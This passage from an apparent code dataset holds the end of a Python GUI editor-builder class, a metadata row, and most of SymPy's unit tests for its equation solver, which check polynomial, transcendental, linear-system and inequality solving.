def add_bool(self, name, attr, update_method="update", *args, **kw):
self.add(BoolEditor(*args, **kw), name, attr, update_method)
def add_vertex(self, name, attr, update_method="update", *args, **kw):
self.add(VertexEditor(*args, **kw), name, attr, update_method)
def add_string(self, name, attr, update_method="update", *args, **kw):
self.add(StringEditor(*args, **kw), name, attr, update_method)
def add_choose(self, name, attr, update_method="update", *args, **kw):
self.add(ChooseEditor(*args, **kw), name, attr, update_method)
class EditorBuilder:
def __init__(self):
self.groups = []
def add_group(self, name):
group = Group(name)
self.groups.append(group)
return group
"""
last = self.groups[-1]
if last.name is None and not last.items:
# Last group is empty default group, so we can remove it
self.groups = [ Group ]
else:
self.groups.append(group)
"""
def build(self, owner, layout):
for group in self.groups:
group.make_widget(owner, layout)
|
gpl-3.0
| 8,687,659,416,699,172,000
| 28.630901
| 74
| 0.581547
| false
| 4.006965
| false
| false
| false
|
alephu5/Soundbyte
|
environment/lib/python3.3/site-packages/sympy/solvers/tests/test_solvers.py
|
1
|
55773
|
from sympy import (
Abs, And, Derivative, Dummy, Eq, Float, Function, Gt, I, Integral,
LambertW, Lt, Matrix, Or, Piecewise, Poly, Q, Rational, S, Symbol,
Wild, acos, asin, atan, atanh, cos, cosh, diff, erf, erfinv, erfc,
erfcinv, erf2, erf2inv, exp, expand, im, log, pi, re, sec, sin,
sinh, solve, solve_linear, sqrt, sstr, symbols, sympify, tan, tanh,
root, simplify, atan2, arg, Mul, SparseMatrix)
from sympy.core.function import nfloat
from sympy.solvers import solve_linear_system, solve_linear_system_LU, \
solve_undetermined_coeffs
from sympy.solvers.solvers import _invert, unrad, checksol, posify, _ispow, \
det_quick, det_perm, det_minor
from sympy.polys.rootoftools import RootOf
from sympy.utilities.pytest import slow, XFAIL, raises, skip
from sympy.utilities.randtest import test_numerically as tn
from sympy.abc import a, b, c, d, k, h, p, x, y, z, t, q, m
def NS(e, n=15, **options):
return sstr(sympify(e).evalf(n, **options), full_prec=True)
def test_swap_back():
f, g = map(Function, 'fg')
fx, gx = f(x), g(x)
assert solve([fx + y - 2, fx - gx - 5], fx, y, gx) == \
{fx: gx + 5, y: -gx - 3}
assert solve(fx + gx*x - 2, [fx, gx]) == {fx: 2, gx: 0}
assert solve(fx + gx**2*x - y, [fx, gx]) == [{fx: y - gx**2*x}]
assert solve([f(1) - 2, x + 2]) == [{x: -2, f(1): 2}]
def guess_solve_strategy(eq, symbol):
try:
solve(eq, symbol)
return True
except (TypeError, NotImplementedError):
return False
def test_guess_poly():
# polynomial equations
assert guess_solve_strategy( S(4), x ) # == GS_POLY
assert guess_solve_strategy( x, x ) # == GS_POLY
assert guess_solve_strategy( x + a, x ) # == GS_POLY
assert guess_solve_strategy( 2*x, x ) # == GS_POLY
assert guess_solve_strategy( x + sqrt(2), x) # == GS_POLY
assert guess_solve_strategy( x + 2**Rational(1, 4), x) # == GS_POLY
assert guess_solve_strategy( x**2 + 1, x ) # == GS_POLY
assert guess_solve_strategy( x**2 - 1, x ) # == GS_POLY
assert guess_solve_strategy( x*y + y, x ) # == GS_POLY
assert guess_solve_strategy( x*exp(y) + y, x) # == GS_POLY
assert guess_solve_strategy(
(x - y**3)/(y**2*sqrt(1 - y**2)), x) # == GS_POLY
def test_guess_poly_cv():
# polynomial equations via a change of variable
assert guess_solve_strategy( sqrt(x) + 1, x ) # == GS_POLY_CV_1
assert guess_solve_strategy(
x**Rational(1, 3) + sqrt(x) + 1, x ) # == GS_POLY_CV_1
assert guess_solve_strategy( 4*x*(1 - sqrt(x)), x ) # == GS_POLY_CV_1
# polynomial equation multiplying both sides by x**n
assert guess_solve_strategy( x + 1/x + y, x ) # == GS_POLY_CV_2
def test_guess_rational_cv():
# rational functions
assert guess_solve_strategy( (x + 1)/(x**2 + 2), x) # == GS_RATIONAL
assert guess_solve_strategy(
(x - y**3)/(y**2*sqrt(1 - y**2)), y) # == GS_RATIONAL_CV_1
# rational functions via the change of variable y -> x**n
assert guess_solve_strategy( (sqrt(x) + 1)/(x**Rational(1, 3) + sqrt(x) + 1), x ) \
#== GS_RATIONAL_CV_1
def test_guess_transcendental():
#transcendental functions
assert guess_solve_strategy( exp(x) + 1, x ) # == GS_TRANSCENDENTAL
assert guess_solve_strategy( 2*cos(x) - y, x ) # == GS_TRANSCENDENTAL
assert guess_solve_strategy(
exp(x) + exp(-x) - y, x ) # == GS_TRANSCENDENTAL
assert guess_solve_strategy(3**x - 10, x) # == GS_TRANSCENDENTAL
assert guess_solve_strategy(-3**x + 10, x) # == GS_TRANSCENDENTAL
assert guess_solve_strategy(a*x**b - y, x) # == GS_TRANSCENDENTAL
def test_solve_args():
# implicit symbol to solve for
assert set(solve(x**2 - 4)) == set([S(2), -S(2)])
assert solve([x + y - 3, x - y - 5]) == {x: 4, y: -1}
assert solve(x - exp(x), x, implicit=True) == [exp(x)]
# no symbol to solve for
assert solve(42) == []
assert solve([1, 2]) == []
# duplicate symbols removed
assert solve((x - 3, y + 2), x, y, x) == {x: 3, y: -2}
# unordered symbols
# only 1
assert solve(y - 3, set([y])) == [3]
# more than 1
assert solve(y - 3, set([x, y])) == [{y: 3}]
# multiple symbols: take the first linear solution
assert solve(x + y - 3, [x, y]) == [{x: 3 - y}]
# unless it is an undetermined coefficients system
assert solve(a + b*x - 2, [a, b]) == {a: 2, b: 0}
assert solve(a*x**2 + b*x + c -
((x - h)**2 + 4*p*k)/4/p,
[h, p, k], exclude=[a, b, c], dict=True) == \
[{k: (4*a*c - b**2)/(4*a), h: -b/(2*a), p: 1/(4*a)}]
# failing undetermined system
assert solve(a*x + b**2/(x + 4) - 3*x - 4/x, a, b) == \
[{a: (-b**2*x + 3*x**3 + 12*x**2 + 4*x + 16)/(x**2*(x + 4))}]
# failed single equation
assert solve(1/(1/x - y + exp(y))) == []
raises(
NotImplementedError, lambda: solve(exp(x) + sin(x) + exp(y) + sin(y)))
# failed system
# -- when no symbols given, 1 fails
assert solve([y, exp(x) + x]) == [{x: -LambertW(1), y: 0}]
# both fail
assert solve(
(exp(x) - x, exp(y) - y)) == [{x: -LambertW(-1), y: -LambertW(-1)}]
# -- when symbols given
solve([y, exp(x) + x], x, y) == [(-LambertW(1), 0)]
# symbol is a number
assert solve(x**2 - pi, pi) == [x**2]
# no equations
assert solve([], [x]) == []
# overdetermined system
# - nonlinear
assert solve([(x + y)**2 - 4, x + y - 2]) == [{x: -y + 2}]
# - linear
assert solve((x + y - 2, 2*x + 2*y - 4)) == {x: -y + 2}
def test_solve_polynomial1():
assert solve(3*x - 2, x) == [Rational(2, 3)]
assert solve(Eq(3*x, 2), x) == [Rational(2, 3)]
assert set(solve(x**2 - 1, x)) == set([-S(1), S(1)])
assert set(solve(Eq(x**2, 1), x)) == set([-S(1), S(1)])
assert solve(x - y**3, x) == [y**3]
assert set(solve(x - y**3, y)) == set([
(-x**Rational(1, 3))/2 + I*sqrt(3)*x**Rational(1, 3)/2,
x**Rational(1, 3),
(-x**Rational(1, 3))/2 - I*sqrt(3)*x**Rational(1, 3)/2,
])
a11, a12, a21, a22, b1, b2 = symbols('a11,a12,a21,a22,b1,b2')
assert solve([a11*x + a12*y - b1, a21*x + a22*y - b2], x, y) == \
{
x: (a22*b1 - a12*b2)/(a11*a22 - a12*a21),
y: (a11*b2 - a21*b1)/(a11*a22 - a12*a21),
}
solution = {y: S.Zero, x: S.Zero}
assert solve((x - y, x + y), x, y ) == solution
assert solve((x - y, x + y), (x, y)) == solution
assert solve((x - y, x + y), [x, y]) == solution
assert set(solve(x**3 - 15*x - 4, x)) == set([
-2 + 3**Rational(1, 2),
S(4),
-2 - 3**Rational(1, 2)
])
assert set(solve((x**2 - 1)**2 - a, x)) == \
set([sqrt(1 + sqrt(a)), -sqrt(1 + sqrt(a)),
sqrt(1 - sqrt(a)), -sqrt(1 - sqrt(a))])
def test_solve_polynomial2():
assert solve(4, x) == []
def test_solve_polynomial_cv_1a():
"""
Test for solving on equations that can be converted to a polynomial equation
using the change of variable y -> x**Rational(p, q)
"""
assert solve( sqrt(x) - 1, x) == [1]
assert solve( sqrt(x) - 2, x) == [4]
assert solve( x**Rational(1, 4) - 2, x) == [16]
assert solve( x**Rational(1, 3) - 3, x) == [27]
assert solve(sqrt(x) + x**Rational(1, 3) + x**Rational(1, 4), x) == [0]
def test_solve_polynomial_cv_1b():
assert set(solve(4*x*(1 - a*sqrt(x)), x)) == set([S(0), 1/a**2])
assert set(solve(x * (x**(S(1)/3) - 3), x)) == set([S(0), S(27)])
def test_solve_polynomial_cv_2():
"""
Test for solving on equations that can be converted to a polynomial equation
multiplying both sides of the equation by x**m
"""
assert solve(x + 1/x - 1, x) in \
[[ Rational(1, 2) + I*sqrt(3)/2, Rational(1, 2) - I*sqrt(3)/2],
[ Rational(1, 2) - I*sqrt(3)/2, Rational(1, 2) + I*sqrt(3)/2]]
def test_quintics_1():
f = x**5 - 110*x**3 - 55*x**2 + 2310*x + 979
s = solve(f, check=False)
for root in s:
res = f.subs(x, root.n()).n()
assert tn(res, 0)
f = x**5 - 15*x**3 - 5*x**2 + 10*x + 20
s = solve(f)
for root in s:
assert root.func == RootOf
# if one uses solve to get the roots of a polynomial that has a RootOf
# solution, make sure that the use of nfloat during the solve process
# doesn't fail. Note: if you want numerical solutions to a polynomial
# it is *much* faster to use nroots to get them than to solve the
# equation only to get RootOf solutions which are then numerically
# evaluated. So for eq = x**5 + 3*x + 7 do Poly(eq).nroots() rather
# than [i.n() for i in solve(eq)] to get the numerical roots of eq.
assert nfloat(solve(x**5 + 3*x**3 + 7)[0], exponent=False) == \
RootOf(x**5 + 3*x**3 + 7, 0).n()
def test_highorder_poly():
# just testing that the uniq generator is unpacked
sol = solve(x**6 - 2*x + 2)
assert all(isinstance(i, RootOf) for i in sol) and len(sol) == 6
@XFAIL
@slow
def test_quintics_2():
f = x**5 + 15*x + 12
s = solve(f, check=False)
for root in s:
res = f.subs(x, root.n()).n()
assert tn(res, 0)
f = x**5 - 15*x**3 - 5*x**2 + 10*x + 20
s = solve(f)
for root in s:
assert root.func == RootOf
def test_solve_rational():
"""Test solve for rational functions"""
assert solve( ( x - y**3 )/( (y**2)*sqrt(1 - y**2) ), x) == [y**3]
def test_solve_nonlinear():
assert solve(x**2 - y**2, x, y) == [{x: -y}, {x: y}]
assert solve(x**2 - y**2/exp(x), x, y) == [{x: 2*LambertW(y/2)}]
assert solve(x**2 - y**2/exp(x), y, x) == [{y: -x*exp(x/2)}, {y: x*exp(x/2)}]
def test_issue_4129():
assert solve(4**(2*(x**2) + 2*x) - 8, x) == [-Rational(3, 2), S.Half]
def test_issue_4091():
assert solve(log(x-3) + log(x+3), x) == [sqrt(10)]
def test_linear_system():
x, y, z, t, n = symbols('x, y, z, t, n')
assert solve([x - 1, x - y, x - 2*y, y - 1], [x, y]) == []
assert solve([x - 1, x - y, x - 2*y, x - 1], [x, y]) == []
assert solve([x - 1, x - 1, x - y, x - 2*y], [x, y]) == []
assert solve([x + 5*y - 2, -3*x + 6*y - 15], x, y) == {x: -3, y: 1}
M = Matrix([[0, 0, n*(n + 1), (n + 1)**2, 0],
[n + 1, n + 1, -2*n - 1, -(n + 1), 0],
[-1, 0, 1, 0, 0]])
assert solve_linear_system(M, x, y, z, t) == \
{x: -t - t/n, z: -t - t/n, y: 0}
assert solve([x + y + z + t, -z - t], x, y, z, t) == {x: -y, z: -t}
def test_linear_system_function():
a = Function('a')
assert solve([a(0, 0) + a(0, 1) + a(1, 0) + a(1, 1), -a(1, 0) - a(1, 1)],
a(0, 0), a(0, 1), a(1, 0), a(1, 1)) == {a(1, 0): -a(1, 1), a(0, 0): -a(0, 1)}
def test_linear_systemLU():
n = Symbol('n')
M = Matrix([[1, 2, 0, 1], [1, 3, 2*n, 1], [4, -1, n**2, 1]])
assert solve_linear_system_LU(M, [x, y, z]) == {z: -3/(n**2 + 18*n),
x: 1 - 12*n/(n**2 + 18*n),
y: 6*n/(n**2 + 18*n)}
# Note: multiple solutions exist for some of these equations, so the tests
# should be expected to break if the implementation of the solver changes
# in such a way that a different branch is chosen
def test_tsolve():
assert solve(exp(x) - 3, x) == [log(3)]
assert set(solve((a*x + b)*(exp(x) - 3), x)) == set([-b/a, log(3)])
assert solve(cos(x) - y, x) == [-acos(y) + 2*pi, acos(y)]
assert solve(2*cos(x) - y, x) == [-acos(y/2) + 2*pi, acos(y/2)]
assert solve(Eq(cos(x), sin(x)), x) == [-3*pi/4, pi/4]
assert set(solve(exp(x) + exp(-x) - y, x)) in [set([
log(y/2 - sqrt(y**2 - 4)/2),
log(y/2 + sqrt(y**2 - 4)/2),
]), set([
log(y - sqrt(y**2 - 4)) - log(2),
log(y + sqrt(y**2 - 4)) - log(2)]),
set([
log(y/2 - sqrt((y - 2)*(y + 2))/2),
log(y/2 + sqrt((y - 2)*(y + 2))/2)])]
assert solve(exp(x) - 3, x) == [log(3)]
assert solve(Eq(exp(x), 3), x) == [log(3)]
assert solve(log(x) - 3, x) == [exp(3)]
assert solve(sqrt(3*x) - 4, x) == [Rational(16, 3)]
assert solve(3**(x + 2), x) == []
assert solve(3**(2 - x), x) == []
assert solve(x + 2**x, x) == [-LambertW(log(2))/log(2)]
ans = solve(3*x + 5 + 2**(-5*x + 3), x)
assert len(ans) == 1 and ans[0].expand() == \
-Rational(5, 3) + LambertW(-10240*2**(S(1)/3)*log(2)/3)/(5*log(2))
assert solve(5*x - 1 + 3*exp(2 - 7*x), x) == \
[Rational(1, 5) + LambertW(-21*exp(Rational(3, 5))/5)/7]
assert solve(2*x + 5 + log(3*x - 2), x) == \
[Rational(2, 3) + LambertW(2*exp(-Rational(19, 3))/3)/2]
assert solve(3*x + log(4*x), x) == [LambertW(Rational(3, 4))/3]
assert set(solve((2*x + 8)*(8 + exp(x)), x)) == set([S(-4), log(8) + pi*I])
eq = 2*exp(3*x + 4) - 3
ans = solve(eq, x) # this generated a failure in flatten
assert len(ans) == 3 and all(eq.subs(x, a).n(chop=True) == 0 for a in ans)
assert solve(2*log(3*x + 4) - 3, x) == [(exp(Rational(3, 2)) - 4)/3]
assert solve(exp(x) + 1, x) == [pi*I]
eq = 2*(3*x + 4)**5 - 6*7**(3*x + 9)
result = solve(eq, x)
ans = [(log(2401) + 5*LambertW(-log(7**(7*3**Rational(1, 5)/5))))/(3*log(7))/-1]
assert result == ans
# it works if expanded, too
assert solve(eq.expand(), x) == result
assert solve(z*cos(x) - y, x) == [-acos(y/z) + 2*pi, acos(y/z)]
assert solve(z*cos(2*x) - y, x) == [-acos(y/z)/2 + pi, acos(y/z)/2]
assert solve(z*cos(sin(x)) - y, x) == [
asin(acos(y/z) - 2*pi) + pi, -asin(acos(y/z)) + pi,
-asin(acos(y/z) - 2*pi), asin(acos(y/z))]
assert solve(z*cos(x), x) == [pi/2, 3*pi/2]
# issue #1409
assert solve(y - b*x/(a + x), x) in [[-a*y/(y - b)], [a*y/(b - y)]]
assert solve(y - b*exp(a/x), x) == [a/log(y/b)]
# issue #1408
assert solve(y - b/(1 + a*x), x) in [[(b - y)/(a*y)], [-((y - b)/(a*y))]]
# issue #1407
assert solve(y - a*x**b, x) == [(y/a)**(1/b)]
# issue #1406
assert solve(z**x - y, x) == [log(y)/log(z)]
# issue #1405
assert solve(2**x - 10, x) == [log(10)/log(2)]
# issue #3645
assert solve(x*y) == [{x: 0}, {y: 0}]
assert solve([x*y]) == [{x: 0}, {y: 0}]
assert solve(x**y - 1) == [{x: 1}, {y: 0}]
assert solve([x**y - 1]) == [{x: 1}, {y: 0}]
assert solve(x*y*(x**2 - y**2)) == [{x: 0}, {x: -y}, {x: y}, {y: 0}]
assert solve([x*y*(x**2 - y**2)]) == [{x: 0}, {x: -y}, {x: y}, {y: 0}]
#issue #1640
assert solve(exp(log(5)*x) - 2**x, x) == [0]
def test_solve_for_functions_derivatives():
t = Symbol('t')
x = Function('x')(t)
y = Function('y')(t)
a11, a12, a21, a22, b1, b2 = symbols('a11,a12,a21,a22,b1,b2')
soln = solve([a11*x + a12*y - b1, a21*x + a22*y - b2], x, y)
assert soln == {
x: (a22*b1 - a12*b2)/(a11*a22 - a12*a21),
y: (a11*b2 - a21*b1)/(a11*a22 - a12*a21),
}
assert solve(x - 1, x) == [1]
assert solve(3*x - 2, x) == [Rational(2, 3)]
soln = solve([a11*x.diff(t) + a12*y.diff(t) - b1, a21*x.diff(t) +
a22*y.diff(t) - b2], x.diff(t), y.diff(t))
assert soln == { y.diff(t): (a11*b2 - a21*b1)/(a11*a22 - a12*a21),
x.diff(t): (a22*b1 - a12*b2)/(a11*a22 - a12*a21) }
assert solve(x.diff(t) - 1, x.diff(t)) == [1]
assert solve(3*x.diff(t) - 2, x.diff(t)) == [Rational(2, 3)]
eqns = set((3*x - 1, 2*y - 4))
assert solve(eqns, set((x, y))) == { x: Rational(1, 3), y: 2 }
x = Symbol('x')
f = Function('f')
F = x**2 + f(x)**2 - 4*x - 1
assert solve(F.diff(x), diff(f(x), x)) == [(-x + 2)/f(x)]
# Mixed cased with a Symbol and a Function
x = Symbol('x')
y = Function('y')(t)
soln = solve([a11*x + a12*y.diff(t) - b1, a21*x +
a22*y.diff(t) - b2], x, y.diff(t))
assert soln == { y.diff(t): (a11*b2 - a21*b1)/(a11*a22 - a12*a21),
x: (a22*b1 - a12*b2)/(a11*a22 - a12*a21) }
def test_issue626():
f = Function('f')
F = x**2 + f(x)**2 - 4*x - 1
e = F.diff(x)
assert solve(e, f(x).diff(x)) in [[(2 - x)/f(x)], [-((x - 2)/f(x))]]
def test_issue771():
a, b, c, d = symbols('a b c d')
A = Matrix(2, 2, [a, b, c, d])
B = Matrix(2, 2, [0, 2, -3, 0])
C = Matrix(2, 2, [1, 2, 3, 4])
assert solve(A*B - C, [a, b, c, d]) == {a: 1, b: -S(1)/3, c: 2, d: -1}
assert solve([A*B - C], [a, b, c, d]) == {a: 1, b: -S(1)/3, c: 2, d: -1}
assert solve(Eq(A*B, C), [a, b, c, d]) == {a: 1, b: -S(1)/3, c: 2, d: -1}
assert solve([A*B - B*A], [a, b, c, d]) == {a: d, b: -S(2)/3*c}
assert solve([A*C - C*A], [a, b, c, d]) == {a: d - c, b: S(2)/3*c}
assert solve([A*B - B*A, A*C - C*A], [a, b, c, d]) == {a: d, b: 0, c: 0}
assert solve([Eq(A*B, B*A)], [a, b, c, d]) == {a: d, b: -S(2)/3*c}
assert solve([Eq(A*C, C*A)], [a, b, c, d]) == {a: d - c, b: S(2)/3*c}
assert solve([Eq(A*B, B*A), Eq(A*C, C*A)], [a, b, c, d]) == {a: d, b: 0, c: 0}
def test_solve_linear():
w = Wild('w')
assert solve_linear(x, x) == (0, 1)
assert solve_linear(x, y - 2*x) in [(x, y/3), (y, 3*x)]
assert solve_linear(x, y - 2*x, exclude=[x]) == (y, 3*x)
assert solve_linear(3*x - y, 0) in [(x, y/3), (y, 3*x)]
assert solve_linear(3*x - y, 0, [x]) == (x, y/3)
assert solve_linear(3*x - y, 0, [y]) == (y, 3*x)
assert solve_linear(x**2/y, 1) == (y, x**2)
assert solve_linear(w, x) in [(w, x), (x, w)]
assert solve_linear(cos(x)**2 + sin(x)**2 + 2 + y) == \
(y, -2 - cos(x)**2 - sin(x)**2)
assert solve_linear(cos(x)**2 + sin(x)**2 + 2 + y, symbols=[x]) == (0, 1)
assert solve_linear(Eq(x, 3)) == (x, 3)
assert solve_linear(1/(1/x - 2)) == (0, 0)
assert solve_linear((x + 1)*exp(-x), symbols=[x]) == (x + 1, exp(x))
assert solve_linear((x + 1)*exp(x), symbols=[x]) == ((x + 1)*exp(x), 1)
assert solve_linear(x*exp(-x**2), symbols=[x]) == (0, 0)
raises(ValueError, lambda: solve_linear(Eq(x, 3), 3))
def test_solve_undetermined_coeffs():
assert solve_undetermined_coeffs(a*x**2 + b*x**2 + b*x + 2*c*x + c + 1, [a, b, c], x) == \
{a: -2, b: 2, c: -1}
# Test that rational functions work
assert solve_undetermined_coeffs(a/x + b/(x + 1) - (2*x + 1)/(x**2 + x), [a, b], x) == \
{a: 1, b: 1}
# Test cancellation in rational functions
assert solve_undetermined_coeffs(((c + 1)*a*x**2 + (c + 1)*b*x**2 +
(c + 1)*b*x + (c + 1)*2*c*x + (c + 1)**2)/(c + 1), [a, b, c], x) == \
{a: -2, b: 2, c: -1}
def test_solve_inequalities():
system = [Lt(x**2 - 2, 0), Gt(x**2 - 1, 0)]
assert solve(system) == \
And(Or(And(Lt(-sqrt(2), re(x)), Lt(re(x), -1)),
And(Lt(1, re(x)), Lt(re(x), sqrt(2)))), Eq(im(x), 0))
assert solve(system, assume=Q.real(x)) == \
Or(And(Lt(-sqrt(2), x), Lt(x, -1)), And(Lt(1, x), Lt(x, sqrt(2))))
# issue 3528, 3448
assert solve((x - 3)/(x - 2) < 0, x, assume=Q.real(x)) == And(Lt(2, x), Lt(x, 3))
assert solve(x/(x + 1) > 1, x, assume=Q.real(x)) == Lt(x, -1)
def test_issue_1694():
assert solve(1/x) == []
assert solve(x*(1 - 5/x)) == [5]
assert solve(x + sqrt(x) - 2) == [1]
assert solve(-(1 + x)/(2 + x)**2 + 1/(2 + x)) == []
assert solve(-x**2 - 2*x + (x + 1)**2 - 1) == []
assert solve((x/(x + 1) + 3)**(-2)) == []
assert solve(x/sqrt(x**2 + 1), x) == [0]
assert solve(exp(x) - y, x) == [log(y)]
assert solve(exp(x)) == []
assert solve(x**2 + x + sin(y)**2 + cos(y)**2 - 1, x) in [[0, -1], [-1, 0]]
eq = 4*3**(5*x + 2) - 7
ans = solve(eq, x)
assert len(ans) == 5 and all(eq.subs(x, a).n(chop=True) == 0 for a in ans)
assert solve(log(x**2) - y**2/exp(x), x, y, set=True) == \
([y], set([
(-sqrt(exp(x)*log(x**2)),),
(sqrt(exp(x)*log(x**2)),)]))
assert solve(x**2*z**2 - z**2*y**2) == [{x: -y}, {x: y}, {z: 0}]
assert solve((x - 1)/(1 + 1/(x - 1))) == []
assert solve(x**(y*z) - x, x) == [1]
raises(NotImplementedError, lambda: solve(log(x) - exp(x), x))
raises(NotImplementedError, lambda: solve(2**x - exp(x) - 3))
def test_PR1964():
# 2072
assert solve(sqrt(x)) == solve(sqrt(x**3)) == [0]
assert solve(sqrt(x - 1)) == [1]
# 1363
a = Symbol('a')
assert solve(-3*a/sqrt(x), x) == []
# 1387
assert solve(2*x/(x + 2) - 1, x) == [2]
# 1397
assert set(solve((x**2/(7 - x)).diff(x))) == set([S(0), S(14)])
# 1596
f = Function('f')
assert solve((3 - 5*x/f(x))*f(x), f(x)) == [5*x/3]
# 1398
assert solve(1/(5 + x)**(S(1)/5) - 9, x) == [-295244/S(59049)]
assert solve(sqrt(x) + sqrt(sqrt(x)) - 4) == [-9*sqrt(17)/2 + 49*S.Half]
assert set(solve(Poly(sqrt(exp(x)) + sqrt(exp(-x)) - 4))) in \
[
set([2*log(-sqrt(3) + 2), 2*log(sqrt(3) + 2)]),
set([log(-4*sqrt(3) + 7), log(4*sqrt(3) + 7)]),
]
assert set(solve(Poly(exp(x) + exp(-x) - 4))) == \
set([log(-sqrt(3) + 2), log(sqrt(3) + 2)])
assert set(solve(x**y + x**(2*y) - 1, x)) == \
set([(-S.Half + sqrt(5)/2)**(1/y), (-S.Half - sqrt(5)/2)**(1/y)])
assert solve(exp(x/y)*exp(-z/y) - 2, y) == [(x - z)/log(2)]
assert solve(
x**z*y**z - 2, z) in [[log(2)/(log(x) + log(y))], [log(2)/(log(x*y))]]
# if you do inversion too soon then multiple roots as for the following will
# be missed, e.g. if exp(3*x) = exp(3) -> 3*x = 3
E = S.Exp1
assert set(solve(exp(3*x) - exp(3), x)) in [
set([S(1), log(-E/2 - sqrt(3)*E*I/2), log(-E/2 + sqrt(3)*E*I/2)]),
set([S(1), log(E*(-S(1)/2 - sqrt(3)*I/2)), log(E*(-S(1)/2 + sqrt(3)*I/2))]),
]
# coverage test
p = Symbol('p', positive=True)
assert solve((1/p + 1)**(p + 1)) == []
def test_issue_2098():
x = Symbol('x', real=True)
assert solve(x**2 + 1, x) == []
n = Symbol('n', integer=True, positive=True)
assert solve((n - 1)*(n + 2)*(2*n - 1), n) == [1]
x = Symbol('x', positive=True)
y = Symbol('y')
assert solve([x + 5*y - 2, -3*x + 6*y - 15], x, y) == []
# not {x: -3, y: 1} b/c x is positive
# The solution following should not contain (-sqrt(2), sqrt(2))
assert solve((x + y)*n - y**2 + 2, x, y) == [(sqrt(2), -sqrt(2))]
y = Symbol('y', positive=True)
# The solution following should not contain {y: -x*exp(x/2)}
assert solve(x**2 - y**2/exp(x), y, x) == [{y: x*exp(x/2)}]
assert solve(x**2 - y**2/exp(x), x, y) == [{x: 2*LambertW(y/2)}]
x, y, z = symbols('x y z', positive=True)
assert solve(z**2*x**2 - z**2*y**2/exp(x), y, x, z) == [{y: x*exp(x/2)}]
def test_checking():
assert set(
solve(x*(x - y/x), x, check=False)) == set([sqrt(y), S(0), -sqrt(y)])
assert set(solve(x*(x - y/x), x, check=True)) == set([sqrt(y), -sqrt(y)])
# {x: 0, y: 4} sets denominator to 0 in the following so system should return None
assert solve((1/(1/x + 2), 1/(y - 3) - 1)) == []
# 0 sets denominator of 1/x to zero so None is returned
assert solve(1/(1/x + 2)) == []
def test_issue_1572_1364_1368():
assert solve((sqrt(x**2 - 1) - 2)) in ([sqrt(5), -sqrt(5)],
[-sqrt(5), sqrt(5)])
assert set(solve((2**exp(y**2/x) + 2)/(x**2 + 15), y)) == set([
-sqrt(x)*sqrt(-log(log(2)) + log(log(2) + I*pi)),
sqrt(x)*sqrt(-log(log(2)) + log(log(2) + I*pi))])
C1, C2 = symbols('C1 C2')
f = Function('f')
assert solve(C1 + C2/x**2 - exp(-f(x)), f(x)) == [log(x**2/(C1*x**2 + C2))]
a = Symbol('a')
E = S.Exp1
assert solve(1 - log(a + 4*x**2), x) in (
[-sqrt(-a + E)/2, sqrt(-a + E)/2],
[sqrt(-a + E)/2, -sqrt(-a + E)/2]
)
assert solve(log(a**(-3) - x**2)/a, x) in (
[-sqrt(-1 + a**(-3)), sqrt(-1 + a**(-3))],
[sqrt(-1 + a**(-3)), -sqrt(-1 + a**(-3))],)
assert solve(1 - log(a + 4*x**2), x) in (
[-sqrt(-a + E)/2, sqrt(-a + E)/2],
[sqrt(-a + E)/2, -sqrt(-a + E)/2],)
assert set(solve((
a**2 + 1) * (sin(a*x) + cos(a*x)), x)) == set([-pi/(4*a), 3*pi/(4*a)])
assert solve(3 - (sinh(a*x) + cosh(a*x)), x) == [log(3)/a]
assert set(solve(3 - (sinh(a*x) + cosh(a*x)**2), x)) == \
set([log(-2 + sqrt(5))/a, log(-sqrt(2) + 1)/a,
log(-sqrt(5) - 2)/a, log(1 + sqrt(2))/a])
assert solve(atan(x) - 1) == [tan(1)]
def test_issue_2033():
r, t = symbols('r,t')
assert set(solve([r - x**2 - y**2, tan(t) - y/x], [x, y])) == \
set([
(-sqrt(r*tan(t)**2/(tan(t)**2 + 1))/tan(t),
-sqrt(r*tan(t)**2/(tan(t)**2 + 1))),
(sqrt(r*tan(t)**2/(tan(t)**2 + 1))/tan(t),
sqrt(r*tan(t)**2/(tan(t)**2 + 1)))])
assert solve([exp(x) - sin(y), 1/y - 3], [x, y]) == \
[(log(sin(S(1)/3)), S(1)/3)]
assert solve([exp(x) - sin(y), 1/exp(y) - 3], [x, y]) == \
[(log(-sin(log(3))), -log(3))]
assert set(solve([exp(x) - sin(y), y**2 - 4], [x, y])) == \
set([(log(-sin(2)), -S(2)), (log(sin(2)), S(2))])
eqs = [exp(x)**2 - sin(y) + z**2, 1/exp(y) - 3]
assert solve(eqs, set=True) == \
([x, y], set([
(log(-sqrt(-z**2 - sin(log(3)))), -log(3)),
(log(sqrt(-z**2 - sin(log(3)))), -log(3))]))
assert solve(eqs, x, z, set=True) == \
([x], set([
(log(-sqrt(-z**2 + sin(y))),),
(log(sqrt(-z**2 + sin(y))),)]))
assert set(solve(eqs, x, y)) == \
set([
(log(-sqrt(-z**2 - sin(log(3)))), -log(3)),
(log(sqrt(-z**2 - sin(log(3)))), -log(3))])
assert set(solve(eqs, y, z)) == \
set([
(-log(3), -sqrt(-exp(2*x) - sin(log(3)))),
(-log(3), sqrt(-exp(2*x) - sin(log(3))))])
eqs = [exp(x)**2 - sin(y) + z, 1/exp(y) - 3]
assert solve(eqs, set=True) == ([x, y], set(
[
(log(-sqrt(-z - sin(log(3)))), -log(3)),
(log(sqrt(-z - sin(log(3)))), -log(3))]))
assert solve(eqs, x, z, set=True) == ([x], set(
[
(log(-sqrt(-z + sin(y))),),
(log(sqrt(-z + sin(y))),)]))
assert set(solve(eqs, x, y)) == set(
[
(log(-sqrt(-z - sin(log(3)))), -log(3)),
(log(sqrt(-z - sin(log(3)))), -log(3))])
assert solve(eqs, z, y) == \
[(-exp(2*x) - sin(log(3)), -log(3))]
assert solve((sqrt(x**2 + y**2) - sqrt(10), x + y - 4), set=True) == (
[x, y], set([(S(1), S(3)), (S(3), S(1))]))
assert set(solve((sqrt(x**2 + y**2) - sqrt(10), x + y - 4), x, y)) == \
set([(S(1), S(3)), (S(3), S(1))])
def test_issue_2236():
lam, a0, conc = symbols('lam a0 conc')
eqs = [lam + 2*y - a0*(1 - x/2)*x - 0.005*x/2*x,
a0*(1 - x/2)*x - 1*y - 0.743436700916726*y,
x + y - conc]
sym = [x, y, a0]
# there are 4 solutions but only two are valid
assert len(solve(eqs, sym, manual=True, minimal=True, simplify=False)) == 2
def test_issue_2236_float():
skip("This test hangs.")
lam, a0, conc = symbols('lam a0 conc')
eqs = [lam + 2*y - a0*(1 - x/2)*x - 0.005*x/2*x,
a0*(1 - x/2)*x - 1*y - 0.743436700916726*y,
x + y - conc]
sym = [x, y, a0]
assert len(
